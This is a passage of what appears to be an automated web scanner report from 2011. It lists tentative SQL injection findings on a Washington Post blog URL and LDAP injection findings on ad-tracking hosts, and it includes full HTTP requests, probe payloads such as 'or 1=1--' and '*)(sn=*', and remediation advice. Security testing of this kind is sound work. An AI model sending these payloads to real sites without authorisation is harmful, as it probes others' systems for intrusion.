<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["sn
...[SNIP]...

1.28. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payloads 12449423'%20or%201%3d1--%20 and 12449423'%20or%201%3d2--%20 were each submitted in the REST URL parameter 8. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html12449423'%20or%201%3d1--%20 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; rss_now=false; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: d60de356-9576-4921-b120-36c06414da3f
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:16:19 GMT
Date: Tue, 10 May 2011 13:16:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="13684742"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:16:19 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:[
...[SNIP]...

Request 2

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html12449423'%20or%201%3d2--%20 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; rss_now=false; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 4c59412c-65cb-4871-ade3-da2220a18ed3
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:16:19 GMT
Date: Tue, 10 May 2011 13:16:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:15:29 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["s
...[SNIP]...

1.29. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19589935%20or%201%3d1--%20 and 19589935%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html?119589935%20or%201%3d1--%20=1 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: b793f480-3c16-4fd5-b0eb-c7dfa68cbcad
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:19:17 GMT
Date: Tue, 10 May 2011 13:19:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:17:28 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["s
...[SNIP]...

Request 2

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html?119589935%20or%201%3d2--%20=1 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 155d7a29-1267-4b25-8e8f-29d8c9c7cab0
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:19:17 GMT
Date: Tue, 10 May 2011 13:19:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="13696988"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:19:16 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:[
...[SNIP]...

2. LDAP injection
There are 7 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://a.tribalfusion.com/j.ad [p parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The p parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /j.ad?site=gathercom&adSpace=ros&tagKey=2218970080&th=22778850880&tKey=undefined&size=300x250&p=*)(sn=*&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fpolitics.gather.com%2FviewArticle.action%3FarticleId%3D281474979309848&f=0&rnd=13173106 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Mon, 08-Aug-2011 13:24:37 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 383

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aomNnAT6rp3G32XUnLTPip26QhQAFE4WUq0HUZbnW2u3PZbS3GrgUsU8VGB8R6FvWdUWUFFS3betWqjpTaFbSaYFSGQIRr6wRW7aVGfQ2FTvmWqrXaPp2tUEPVfH2mYZamWEoTHjcXrfiXFji1EesRFrBWFBS0EUio9ZaFRK/http://www.LetsMove.gov"><img src="http://cdn5.tribalfusion.com/media/2467856.gif" border=0 height=250 width=300 ><\/a><\/center>');

Request 2

GET /j.ad?site=gathercom&adSpace=ros&tagKey=2218970080&th=22778850880&tKey=undefined&size=300x250&p=*)!(sn=*&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fpolitics.gather.com%2FviewArticle.action%3FarticleId%3D281474979309848&f=0&rnd=13173106 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Mon, 08-Aug-2011 13:24:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 393

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/a4mNnAprrEYsrSYcv40cvupab32FZbRTFfFWPrYPqb1SVBtSHZbr0dbtWAYp2GB40U3JTATu5mM7P6MA4dBrXdYAnt2u36Y05Vj8UsF9UcJ6R6FuUtM3UbZb12rApUqMoTaU7QEMISGQAQbZasSdMdWsYS2U6xyTeEn4VGpO/http://www.fightarthritispain.org"><img src="http://cdn5.tribalfusion.com/media/2467796.gif" border=0 height=250 width=300 ><\/a><\/center>');

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1d130a381bb27744)(sn=* and 1d130a381bb27744)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=1d130a381bb27744)(sn=*&PRAd=253732016&AR_C=207615354 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=43&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:38:16 2011&prad=242390407&arc=206438258&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 May 2011 13:42:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1d130a381bb27744&#41;&#40;sn=exp=1&initExp=Tue May 10 13:42:08 2011&recExp=Tue May 10 13:42:08 2011&prad=253732016&arc=207615354&; expires=Mon 08-Aug-2011 13:42:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305034928; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1d130a381bb27744)!(sn=*&PRAd=253732016&AR_C=207615354 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=43&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:38:16 2011&prad=242390407&arc=206438258&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 May 2011 13:42:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1d130a381bb27744&#41;!&#40;sn=exp=1&initExp=Tue May 10 13:42:08 2011&recExp=Tue May 10 13:42:08 2011&prad=253732016&arc=207615354&; expires=Mon 08-Aug-2011 13:42:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305034928; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

2.3. http://data.cmcore.com/imp [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 150267e1551cb568)(sn=* and 150267e1551cb568)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=150267e1551cb568)(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=728x90&cm_mmca2=728x90_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=22K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
